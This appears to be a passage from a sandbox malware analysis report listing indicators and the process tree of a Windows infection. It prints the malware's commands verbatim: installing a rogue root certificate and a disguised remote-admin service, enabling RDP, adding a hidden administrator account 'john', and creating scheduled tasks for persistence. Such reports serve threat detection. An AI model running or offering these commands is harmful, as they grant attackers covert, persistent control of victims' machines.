Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CacheLimit = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance	Downloads.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\AllComplete = "1"	MicrosoftEdge.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

Processes:

aliens.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD	aliens.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD\Blob = 0300000001000000140000006c0ce2dd0584c47cac18839f14055f19fa270cdd2000000001000000500500003082054c30820434a0030201020206016de34cff62300d06092a864886f70d01010b05003081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a301e170d3030303130313030303030305a170d3438313231353039313533375a3081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a30820122300d06092a864886f70d01010105000382010f003082010a0282010100ae86c5043ed34d99f44fa3052ea34047a7fbbe33188b1dc2ca645ca3249e85e54b4921d4998fda6a22247c32d9087d742af3bf850803ae8c1e25faad53fb8fd823b7353d9a3ac992bf917f693826c790e53a540b120b6553508ec9585e467d310bd3ef9fb61731deb522eb78f43f824b34be36782db7a8cb162cd22247b14e4c5ae633ed66542354a59971bddc59160ecdc521b4477c93ca9e624e0af00298602300f5dc368819c3cb9f02604636888276b3a498570473b5328b0834f327c34285e333da9207e12f0edbb654c8cf11e3cc7cba17a52cd7cd42c10ae095a2e4eb9d3e3f361488243f0584af40e72d6e6e182149bfb8342384f60f12e14734258d0203010001a382017430820170300f0603551d130101ff040530030101ff3082012c06096086480186f842010d0482011d138201195468697320526f6f74206365727469666963617465207761732067656e65726174656420627920436861726c65732050726f787920666f722053534c2050726f7879696e672e20496620746869732063657274696669636174652069732070617274206f66206120636572746966696361746520636861696e2c2074686973206d65616e73207468617420796f752772652062726f7773696e67207468726f75676820436861726c65732050726f787920776974682053534c2050726f7879696e6720656e61626c656420666f72207468697320776562736974652e20506c656173652073656520687474703a2f2f636861726c657370726f78792e636f6d2f73736c20666f72206d6f726520696e666f726d6174696f6e2e300e0603551d0f0101ff040403020204301d0603551d0e04160414f8d0dc54367cf794020f8b92783a5d8a91251f9f300d06092a864886f70d01010b05000382010100662271eb9d5c744c88382de98ba37320e6312104d04273a92007a8670976d6530e6347d00bbded1319bb6754f36237596095922911e3661a70354f6ba0b797a76258be7adebb8c8dbeeed977760b80271d74b2444d92f6c1337a379b73545b251de5f8812b9625abbbfaedc15f8c6c374b9b26dd0fef035185f5899d8819e689dc6db5f0babbfd637c52b1bec80115b889faeed493d4112d744954ad3abe6607c41a4a2d657ba330ed131fa4e8c25bb28ee181dcef8da91c17bfd30a23c8eae81b152ed85ff938afc32b34ffdaffbdb72d9bb04067bfc87f579eba9637b165ea008ea7408bc8265f33c039bf60f506d245a6b53017afc8e161d70ed5b0d76576	aliens.exe

NTFS ADS 3 IoCs

Processes:

taskhost.exeupdate.exeutorrent.exe

description	ioc	process
File opened for modification	C:\ProgramData\Microsoft\Intel\winmgmts:\localhost\	taskhost.exe
File opened for modification	C:\Users\Admin\Desktop\WinMgmts:\	update.exe
File opened for modification	C:\Users\Admin\Desktop\WinMgmts:\	utorrent.exe

Runs .reg file with regedit 2 IoCs

Processes:

regedit.exeregedit.exe

pid process

2596 regedit.exe
3948 regedit.exe
Runs net.exe
Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXE

pid process

5348 PING.EXE
4880 PING.EXE
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

api.exe

pid process

1620 api.exe

pid	process
2596	regedit.exe
3948	regedit.exe

pid	process
5348	PING.EXE
4880	PING.EXE

pid	process
1620	api.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

update.exerutserv.exerutserv.exerutserv.exerutserv.exewinit.exe

pid	process
4028	update.exe
4028	update.exe
4028	update.exe
4028	update.exe
4028	update.exe
4028	update.exe
4028	update.exe
4028	update.exe
4028	update.exe
4028	update.exe
2108	rutserv.exe
2108	rutserv.exe
2108	rutserv.exe
2108	rutserv.exe
2108	rutserv.exe
2108	rutserv.exe
1628	rutserv.exe
1628	rutserv.exe
1276	rutserv.exe
1276	rutserv.exe
2228	rutserv.exe
2228	rutserv.exe
2228	rutserv.exe
2228	rutserv.exe
2228	rutserv.exe
2228	rutserv.exe
2228	rutserv.exe
2228	rutserv.exe
632	winit.exe
632	winit.exe
632	winit.exe
632	winit.exe
632	winit.exe
632	winit.exe
632	winit.exe
632	winit.exe
632	winit.exe
632	winit.exe
632	winit.exe
632	winit.exe
632	winit.exe
632	winit.exe
632	winit.exe
632	winit.exe
632	winit.exe
632	winit.exe
632	winit.exe
632	winit.exe
632	winit.exe
632	winit.exe
632	winit.exe
632	winit.exe
632	winit.exe
632	winit.exe
632	winit.exe
632	winit.exe
632	winit.exe
632	winit.exe
632	winit.exe
632	winit.exe
632	winit.exe
632	winit.exe
632	winit.exe
632	winit.exe

Suspicious behavior: GetForegroundWindowSpam 3 IoCs

Processes:

taskhostw.exetaskhost.exeapi.exe

pid process

4964 taskhostw.exe
4244 taskhost.exe
1620 api.exe
Suspicious behavior: LoadsDriver 3 IoCs

Processes:

pid process

612
612
612

pid	process
4964	taskhostw.exe
4244	taskhost.exe
1620	api.exe

pid	process
612
612
612

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

rutserv.exerutserv.exerutserv.exetaskkill.exetaskkill.exetaskkill.exeOnlineInstaller.exeOnlineInstaller.tmpAUDIODG.EXERDPWInst.exeRDPWinst.exesystem.exesvchost.exeapi.exe

description	pid	process
Token: SeDebugPrivilege	2108	rutserv.exe
Token: SeDebugPrivilege	1276	rutserv.exe
Token: SeTakeOwnershipPrivilege	2228	rutserv.exe
Token: SeTcbPrivilege	2228	rutserv.exe
Token: SeTcbPrivilege	2228	rutserv.exe
Token: SeDebugPrivilege	4228	taskkill.exe
Token: SeDebugPrivilege	2892	taskkill.exe
Token: SeDebugPrivilege	4316	taskkill.exe
Token: SeDebugPrivilege	4404	OnlineInstaller.exe
Token: SeLoadDriverPrivilege	4404	OnlineInstaller.exe
Token: SeDebugPrivilege	4856	OnlineInstaller.tmp
Token: SeLoadDriverPrivilege	4856	OnlineInstaller.tmp
Token: 33	4780	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	4780	AUDIODG.EXE
Token: SeDebugPrivilege	1400	RDPWInst.exe
Token: SeDebugPrivilege	4216	RDPWinst.exe
Token: SeDebugPrivilege	4416	system.exe
Token: SeAuditPrivilege	4580	svchost.exe
Token: SeRestorePrivilege	1620	api.exe
Token: SeTakeOwnershipPrivilege	1620	api.exe
Token: SeDebugPrivilege	1620	api.exe
Token: SeDebugPrivilege	1620	api.exe
Token: SeDebugPrivilege	1620	api.exe
Token: SeRestorePrivilege	1620	api.exe
Token: SeTakeOwnershipPrivilege	1620	api.exe
Token: SeRestorePrivilege	1620	api.exe
Token: SeTakeOwnershipPrivilege	1620	api.exe
Token: SeRestorePrivilege	1620	api.exe
Token: SeTakeOwnershipPrivilege	1620	api.exe
Token: SeDebugPrivilege	1620	api.exe
Token: SeDebugPrivilege	1620	api.exe
Token: SeDebugPrivilege	1620	api.exe
Token: SeRestorePrivilege	1620	api.exe
Token: SeTakeOwnershipPrivilege	1620	api.exe
Token: SeRestorePrivilege	1620	api.exe
Token: SeTakeOwnershipPrivilege	1620	api.exe
Token: SeRestorePrivilege	1620	api.exe
Token: SeTakeOwnershipPrivilege	1620	api.exe
Token: SeRestorePrivilege	1620	api.exe
Token: SeTakeOwnershipPrivilege	1620	api.exe
Token: SeRestorePrivilege	1620	api.exe
Token: SeTakeOwnershipPrivilege	1620	api.exe
Token: SeRestorePrivilege	1620	api.exe
Token: SeTakeOwnershipPrivilege	1620	api.exe
Token: SeRestorePrivilege	1620	api.exe
Token: SeTakeOwnershipPrivilege	1620	api.exe
Token: SeRestorePrivilege	1620	api.exe
Token: SeTakeOwnershipPrivilege	1620	api.exe
Token: SeRestorePrivilege	1620	api.exe
Token: SeTakeOwnershipPrivilege	1620	api.exe
Token: SeDebugPrivilege	1620	api.exe
Token: SeDebugPrivilege	1620	api.exe
Token: SeDebugPrivilege	1620	api.exe
Token: SeDebugPrivilege	1620	api.exe
Token: SeDebugPrivilege	1620	api.exe
Token: SeDebugPrivilege	1620	api.exe
Token: SeDebugPrivilege	1620	api.exe
Token: SeDebugPrivilege	1620	api.exe
Token: SeDebugPrivilege	1620	api.exe
Token: SeDebugPrivilege	1620	api.exe
Token: SeDebugPrivilege	1620	api.exe
Token: SeDebugPrivilege	1620	api.exe
Token: SeDebugPrivilege	1620	api.exe
Token: SeDebugPrivilege	1620	api.exe

Suspicious use of FindShellTrayWindow 6 IoCs

Processes:

update.exeapi.exemsiexec.exe

pid process

4932 update.exe
4932 update.exe
4932 update.exe
1620 api.exe
1620 api.exe
6020 msiexec.exe
Suspicious use of SendNotifyMessage 5 IoCs

Processes:

update.exeapi.exe

pid process

4932 update.exe
4932 update.exe
4932 update.exe
1620 api.exe
1620 api.exe

pid	process
4932	update.exe
4932	update.exe
4932	update.exe
1620	api.exe
1620	api.exe
6020	msiexec.exe

pid	process
4932	update.exe
4932	update.exe
4932	update.exe
1620	api.exe
1620	api.exe

Suspicious use of SetWindowsHookEx 38 IoCs

Processes:

Downloads.exeupdate.exewini.exewinit.exerutserv.exerutserv.exerutserv.exerutserv.execheat.exetaskhost.exeWinMail.exeWinMail.exetaskhostw.exeR8.exeutorrent.exeazur.exeupdate.exeapi.exeOnlineInstaller.exeOnlineInstaller.tmpRDPWinst.exe002.exeRDPWinst.exealiens.exeMicrosoftEdge.exe97535F5358BB4449.exe97535F5358BB4449.exefirefox.exe1605810348493.exefirefox.exe1605810353930.exefirefox.exe1605810359509.exefirefox.exe1605810362353.exe

pid	process
732	Downloads.exe
732	Downloads.exe
4028	update.exe
768	wini.exe
632	winit.exe
2108	rutserv.exe
1628	rutserv.exe
1276	rutserv.exe
2228	rutserv.exe
1200	cheat.exe
1712	taskhost.exe
4220	WinMail.exe
4192	WinMail.exe
4964	taskhostw.exe
4156	R8.exe
576	utorrent.exe
3548	azur.exe
4932	update.exe
1620	api.exe
1620	api.exe
4404	OnlineInstaller.exe
4856	OnlineInstaller.tmp
4216	RDPWinst.exe
5720	002.exe
5720	002.exe
5316	RDPWinst.exe
5192	aliens.exe
5408	MicrosoftEdge.exe
5304	97535F5358BB4449.exe
5372	97535F5358BB4449.exe
3312	firefox.exe
5724	1605810348493.exe
5940	firefox.exe
5632	1605810353930.exe
5424	firefox.exe
5392	1605810359509.exe
4836	firefox.exe
5928	1605810362353.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

update.exewini.exeWScript.execmd.execheat.exe

description	pid	process	target process
PID 4028 wrote to memory of 768	4028	update.exe	wini.exe
PID 4028 wrote to memory of 768	4028	update.exe	wini.exe
PID 4028 wrote to memory of 768	4028	update.exe	wini.exe
PID 768 wrote to memory of 3696	768	wini.exe	WScript.exe
PID 768 wrote to memory of 3696	768	wini.exe	WScript.exe
PID 768 wrote to memory of 3696	768	wini.exe	WScript.exe
PID 768 wrote to memory of 632	768	wini.exe	winit.exe
PID 768 wrote to memory of 632	768	wini.exe	winit.exe
PID 768 wrote to memory of 632	768	wini.exe	winit.exe
PID 3696 wrote to memory of 2280	3696	WScript.exe	cmd.exe
PID 3696 wrote to memory of 2280	3696	WScript.exe	cmd.exe
PID 3696 wrote to memory of 2280	3696	WScript.exe	cmd.exe
PID 2280 wrote to memory of 2596	2280	cmd.exe	regedit.exe
PID 2280 wrote to memory of 2596	2280	cmd.exe	regedit.exe
PID 2280 wrote to memory of 2596	2280	cmd.exe	regedit.exe
PID 2280 wrote to memory of 3948	2280	cmd.exe	regedit.exe
PID 2280 wrote to memory of 3948	2280	cmd.exe	regedit.exe
PID 2280 wrote to memory of 3948	2280	cmd.exe	regedit.exe
PID 2280 wrote to memory of 2164	2280	cmd.exe	timeout.exe
PID 2280 wrote to memory of 2164	2280	cmd.exe	timeout.exe
PID 2280 wrote to memory of 2164	2280	cmd.exe	timeout.exe
PID 2280 wrote to memory of 2108	2280	cmd.exe	rutserv.exe
PID 2280 wrote to memory of 2108	2280	cmd.exe	rutserv.exe
PID 2280 wrote to memory of 2108	2280	cmd.exe	rutserv.exe
PID 2280 wrote to memory of 1628	2280	cmd.exe	rutserv.exe
PID 2280 wrote to memory of 1628	2280	cmd.exe	rutserv.exe
PID 2280 wrote to memory of 1628	2280	cmd.exe	rutserv.exe
PID 2280 wrote to memory of 1276	2280	cmd.exe	rutserv.exe
PID 2280 wrote to memory of 1276	2280	cmd.exe	rutserv.exe
PID 2280 wrote to memory of 1276	2280	cmd.exe	rutserv.exe
PID 4028 wrote to memory of 1200	4028	update.exe	cheat.exe
PID 4028 wrote to memory of 1200	4028	update.exe	cheat.exe
PID 4028 wrote to memory of 1200	4028	update.exe	cheat.exe
PID 2280 wrote to memory of 996	2280	cmd.exe	attrib.exe
PID 2280 wrote to memory of 996	2280	cmd.exe	attrib.exe
PID 2280 wrote to memory of 996	2280	cmd.exe	attrib.exe
PID 4028 wrote to memory of 1208	4028	update.exe	schtasks.exe
PID 4028 wrote to memory of 1208	4028	update.exe	schtasks.exe
PID 4028 wrote to memory of 1208	4028	update.exe	schtasks.exe
PID 2280 wrote to memory of 1624	2280	cmd.exe	attrib.exe
PID 2280 wrote to memory of 1624	2280	cmd.exe	attrib.exe
PID 2280 wrote to memory of 1624	2280	cmd.exe	attrib.exe
PID 4028 wrote to memory of 2896	4028	update.exe	schtasks.exe
PID 4028 wrote to memory of 2896	4028	update.exe	schtasks.exe
PID 4028 wrote to memory of 2896	4028	update.exe	schtasks.exe
PID 2280 wrote to memory of 2456	2280	cmd.exe	sc.exe
PID 2280 wrote to memory of 2456	2280	cmd.exe	sc.exe
PID 2280 wrote to memory of 2456	2280	cmd.exe	sc.exe
PID 1200 wrote to memory of 1712	1200	cheat.exe	taskhost.exe
PID 1200 wrote to memory of 1712	1200	cheat.exe	taskhost.exe
PID 1200 wrote to memory of 1712	1200	cheat.exe	taskhost.exe
PID 2280 wrote to memory of 1344	2280	cmd.exe	sc.exe
PID 2280 wrote to memory of 1344	2280	cmd.exe	sc.exe
PID 2280 wrote to memory of 1344	2280	cmd.exe	sc.exe
PID 4028 wrote to memory of 1080	4028	update.exe	schtasks.exe
PID 4028 wrote to memory of 1080	4028	update.exe	schtasks.exe
PID 4028 wrote to memory of 1080	4028	update.exe	schtasks.exe
PID 2280 wrote to memory of 64	2280	cmd.exe	sc.exe
PID 2280 wrote to memory of 64	2280	cmd.exe	sc.exe
PID 2280 wrote to memory of 64	2280	cmd.exe	sc.exe
PID 4028 wrote to memory of 2532	4028	update.exe	schtasks.exe
PID 4028 wrote to memory of 2532	4028	update.exe	schtasks.exe
PID 4028 wrote to memory of 2532	4028	update.exe	schtasks.exe
PID 4028 wrote to memory of 3828	4028	update.exe	cmd.exe

Views/modifies file attributes 1 TTPs 5 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

pid process

996 attrib.exe
1624 attrib.exe
5476 attrib.exe
5168 attrib.exe
4576 attrib.exe

pid	process
996	attrib.exe
1624	attrib.exe
5476	attrib.exe
5168	attrib.exe
4576	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Downloads.exe
"C:\Users\Admin\AppData\Local\Temp\Downloads.exe"
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:732

C:\Users\Admin\Desktop\update.exe
"C:\Users\Admin\Desktop\update.exe"
1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Modifies WinLogon
- Drops file in Program Files directory
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4028

C:\ProgramData\Microsoft\Intel\wini.exe
C:\ProgramData\Microsoft\Intel\wini.exe -pnaxui
2⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:768

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"
3⤵
- Suspicious use of WriteProcessMemory
PID:3696

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "
4⤵
- Suspicious use of WriteProcessMemory
PID:2280

C:\Windows\SysWOW64\regedit.exe
regedit /s "reg1.reg"
5⤵
- Runs .reg file with regedit
PID:2596

C:\Windows\SysWOW64\regedit.exe
regedit /s "reg2.reg"
5⤵
- Runs .reg file with regedit
PID:3948

C:\Windows\SysWOW64\timeout.exe
timeout 2
5⤵
- Delays execution with timeout.exe
PID:2164

C:\ProgramData\Windows\rutserv.exe
rutserv.exe /silentinstall
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2108

C:\ProgramData\Windows\rutserv.exe
rutserv.exe /firewall
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:1628

C:\ProgramData\Windows\rutserv.exe
rutserv.exe /start
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1276

C:\Windows\SysWOW64\attrib.exe
ATTRIB +H +S C:\Programdata\Windows\*.*
5⤵
- Views/modifies file attributes
PID:996

C:\Windows\SysWOW64\attrib.exe
ATTRIB +H +S C:\Programdata\Windows
5⤵
- Views/modifies file attributes
PID:1624

C:\Windows\SysWOW64\sc.exe
sc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/1000
5⤵
PID:2456

C:\Windows\SysWOW64\sc.exe
sc config RManService obj= LocalSystem type= interact type= own
5⤵
PID:1344

C:\Windows\SysWOW64\sc.exe
sc config RManService DisplayName= "Microsoft Framework"
5⤵
PID:64

C:\ProgramData\Windows\winit.exe
"C:\ProgramData\Windows\winit.exe"
3⤵
- Executes dropped EXE
- Checks processor information in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:632

C:\Program Files (x86)\Windows Mail\WinMail.exe
"C:\Program Files (x86)\Windows Mail\WinMail" OCInstallUserConfigOE
4⤵
- Suspicious use of SetWindowsHookEx
PID:4220

C:\Program Files\Windows Mail\WinMail.exe
"C:\Program Files\Windows Mail\WinMail" OCInstallUserConfigOE
5⤵
- Suspicious use of SetWindowsHookEx
PID:4192

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat
4⤵
PID:4336

C:\Windows\SysWOW64\timeout.exe
timeout 5
5⤵
- Delays execution with timeout.exe
PID:4528

C:\programdata\install\cheat.exe
C:\programdata\install\cheat.exe -pnaxui
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1200

C:\ProgramData\Microsoft\Intel\taskhost.exe
"C:\ProgramData\Microsoft\Intel\taskhost.exe"
3⤵
- Executes dropped EXE
- NTFS ADS
- Suspicious use of SetWindowsHookEx
PID:1712

C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:4964

C:\ProgramData\Microsoft\Intel\R8.exe
C:\ProgramData\Microsoft\Intel\R8.exe
4⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4156

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"
5⤵
PID:804

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "
6⤵
- Modifies registry class
PID:984

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Rar.exe
7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4228

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Rar.exe
7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2892

C:\Windows\SysWOW64\timeout.exe
timeout 3
7⤵
- Delays execution with timeout.exe
PID:200

C:\Windows\SysWOW64\chcp.com
chcp 1251
7⤵
PID:4600

C:\rdp\Rar.exe
"Rar.exe" e -p555 db.rar
7⤵
- Executes dropped EXE
PID:4844

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Rar.exe
7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4316

C:\Windows\SysWOW64\timeout.exe
timeout 2
7⤵
- Delays execution with timeout.exe
PID:4956

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"
7⤵
PID:4920

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\rdp\bat.bat" "
8⤵
PID:976

C:\Windows\SysWOW64\reg.exe
reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
9⤵
PID:5020

C:\Windows\SysWOW64\reg.exe
reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f
9⤵
PID:1492

C:\Windows\SysWOW64\netsh.exe
netsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
9⤵
PID:4184

C:\Windows\SysWOW64\net.exe
net.exe user "john" "12345" /add
9⤵
PID:1044

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user "john" "12345" /add
10⤵
PID:3992

C:\Windows\SysWOW64\chcp.com
chcp 1251
9⤵
PID:3656

C:\Windows\SysWOW64\net.exe
net localgroup "Администраторы" "John" /add
9⤵
PID:744

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Администраторы" "John" /add
10⤵
PID:4264

C:\Windows\SysWOW64\net.exe
net localgroup "Administratorzy" "John" /add
9⤵
PID:4508

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Administratorzy" "John" /add
10⤵
PID:4488

C:\Windows\SysWOW64\net.exe
net localgroup "Administrators" John /add
9⤵
PID:4352

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Administrators" John /add
10⤵
PID:4432

C:\Windows\SysWOW64\net.exe
net localgroup "Administradores" John /add
9⤵
PID:4632

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Administradores" John /add
10⤵
PID:4444

C:\Windows\SysWOW64\net.exe
net localgroup "Пользователи удаленного рабочего стола" John /add
9⤵
PID:4980

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add
10⤵
PID:4748

C:\Windows\SysWOW64\net.exe
net localgroup "Пользователи удаленного управления" John /add
9⤵
PID:4764

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add
10⤵
PID:3680

C:\Windows\SysWOW64\net.exe
net localgroup "Remote Desktop Users" John /add
9⤵
PID:4908

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add
10⤵
PID:4556

C:\Windows\SysWOW64\net.exe
net localgroup "Usuarios de escritorio remoto" John /add
9⤵
PID:4812

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add
10⤵
PID:4540

C:\Windows\SysWOW64\net.exe
net localgroup "Uzytkownicy pulpitu zdalnego" John /add
9⤵
PID:1792

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add
10⤵
PID:5092

C:\rdp\RDPWInst.exe
"RDPWInst.exe" -i -o
9⤵
- Executes dropped EXE
- Modifies WinLogon
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
PID:1400

C:\Windows\SYSTEM32\netsh.exe
netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
10⤵
PID:4500

C:\rdp\RDPWInst.exe
"RDPWInst.exe" -w
9⤵
- Executes dropped EXE
PID:5692

C:\Windows\SysWOW64\reg.exe
reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f
9⤵
PID:5912

C:\Windows\SysWOW64\net.exe
net accounts /maxpwage:unlimited
9⤵
PID:6032

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 accounts /maxpwage:unlimited
10⤵
PID:6108

C:\Windows\SysWOW64\attrib.exe
attrib +s +h "C:\Program Files\RDP Wrapper\*.*"
9⤵
- Drops file in Program Files directory
- Views/modifies file attributes
PID:5476

C:\Windows\SysWOW64\attrib.exe
attrib +s +h "C:\Program Files\RDP Wrapper"
9⤵
- Drops file in Program Files directory
- Views/modifies file attributes
PID:5168

C:\Windows\SysWOW64\attrib.exe
attrib +s +h "C:\rdp"
9⤵
- Views/modifies file attributes
PID:4576

C:\Windows\SysWOW64\timeout.exe
timeout 2
7⤵
- Delays execution with timeout.exe
PID:5112

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.bat
4⤵
- Drops file in Drivers directory
PID:4312

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDControl" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST
4⤵
- Creates scheduled task(s)
PID:4544

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDStartUP" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST
4⤵
- Creates scheduled task(s)
PID:484

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
4⤵
- Creates scheduled task(s)
PID:4408

C:\ProgramData\WindowsTask\update.exe
C:\ProgramData\WindowsTask\update.exe
4⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:4932

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDControl" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST
2⤵
- Creates scheduled task(s)
PID:1208

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDStartUP" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST
2⤵
- Creates scheduled task(s)
PID:2896

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Taskhost" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC ONLOGON /RL HIGHEST
2⤵
- Creates scheduled task(s)
PID:1080

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Taskhostw" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 2 /RL HIGHEST
2⤵
- Creates scheduled task(s)
PID:2532

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc start appidsvc
2⤵
PID:3828

C:\Windows\SysWOW64\sc.exe
sc start appidsvc
3⤵
PID:2276

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc start appmgmt
2⤵
PID:2100

C:\Windows\SysWOW64\sc.exe
sc start appmgmt
3⤵
PID:1536

C:\Windows\SysWOW64\cmd.exe
